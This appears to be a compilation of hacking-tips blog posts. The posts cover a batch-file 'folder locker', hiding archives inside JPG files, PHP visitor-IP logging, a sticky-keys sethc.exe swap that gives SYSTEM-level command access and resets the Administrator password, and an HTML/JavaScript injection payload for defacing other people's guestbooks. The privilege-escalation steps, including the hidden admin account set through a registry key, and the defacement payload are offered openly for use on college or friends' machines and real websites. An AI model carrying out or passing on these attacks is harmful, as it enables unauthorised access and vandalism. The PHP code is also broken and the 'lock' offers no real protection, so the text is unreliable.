Folder Lock Without Any Software

0 comments
Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock
the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for
password.
Enter the password and enjoy access to the folder.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to hide files in a jpg

0 comments

 You must have a .zip or .rar compressor.

1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you're done!
A quick info-fact:
With this technique of hiding files in a jpg you can send this to anyone and they just
have to rename the file extension to .zip or .rar.
With this technique the Al-Qaeda operatives were able to send info to others
secretively.

How to grab IP address with PHP

0 comments

Today I’ll be showing you how to grab somebodies IP address when they visit a page.
The variable to use is $_SERVER['REMOTE_ADDR'] - It’s that simple. You can use it
for just about anything, here are a few examples.
Printing the Users IP Address:
<?php

print ($_SERVER['REMOTE_ADDR'], "I'm Watching You!");

?>

Printing it to a File:

<?php

$ip = $_SERVER['REMOTE_ADDR'];

$handle = fopen('ipaddresses.txt'', 'a+);

fwrite($handle, $ip); fwrite($handle, "\n");

fclose($handle);

?>

All you have to do, is to make a text file and insert any of these codes or one of your
own and save it as anythingyouwant.php
Then upload it to your website and it'll do the trick :P
The Possibilities for what you can use this to are endless.

How To Hack An Administrator Account With A Guest Account

0 comments

(The only way this is going to work is if your account has permission to mody files in folder
«system32»)
Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed Hack Administrator !!!!there ? or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking ?
well,there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and getting all the privilages an
administrator enjoys on windows.. Interested ? read on…

Concept

Press shift key 5 times and the sticky key dialog shows up.This works even at the
logon screen. But If we replace the sethc.exe which is responsible for the sticky key
dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen,we will get a command prompt with administrator privilages because no user
has logged on. From there we can hack the administrator password,even from a guest
account.

Prerequisites

Guest account with write access to system 32.
Here is how to do that -
  • Go to C:/windows/system32
  • Copy cmd.exe and paste it on desktop
  • rename cmd.exe to sethc.exe
  • Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
  • When asked to overwrite, overwrite the sethc.exe.
  • Now Log out from your guest account and at the user select window,press shift key 5 times.
  •  Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

Press shift key 5 times and command prompt will open.
  • Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
  • You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
  •  Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

''Deface'' A Guestbook With HTML-Injection

0 comments

Go to google and search: guestbook.asp
When you find a guestbook, send in this as a comment:
< --- Inizio codice --- >
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<BODY bgColor=#000000>.
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Hacked By Your_nick</title>
<script>alert("Hacked By Your_nick - Italian Hackers")</script>
<style type="text/css">
<!--
.style1 {
font-size: 36px;
font-family: Arial, Helvetica, sans-serif;
color: #00FF00;
}
.style2 {font-size: 18px; font-family: Arial, Helvetica, sans-serif;
color: #ffffff; }
.style3 {font-size: 36px; font-family: Arial, Helvetica, sans-serif;
color: #000000; font-weight: bold; }
-->
</style>
</head>
<body>
<center><p class="style1"><img
src="http://www.baywoodracquetclub.com/images/warning.jpg" width="301"
height="268"></p>
</center>
<p align="center" class="style1"><strong>This Web Site contains bug -
HaCkEd By Your_Nick - Italian Hackers
</strong></p>
<p align="center" class="style3"><img
src="http://www.scuolepistoia.it/lsssalutati/Immagini/Formazione/Progetto
%20SOU%20(Spazio%20Orientamento%20Universitario).gif" width="204"
height="153"></p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp;</p>
<p align="center" class="style2"><b>Site HaCkEd By Your_Nick</b></p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp; </p>
</body>
</html>
< ---- Fine codice --- >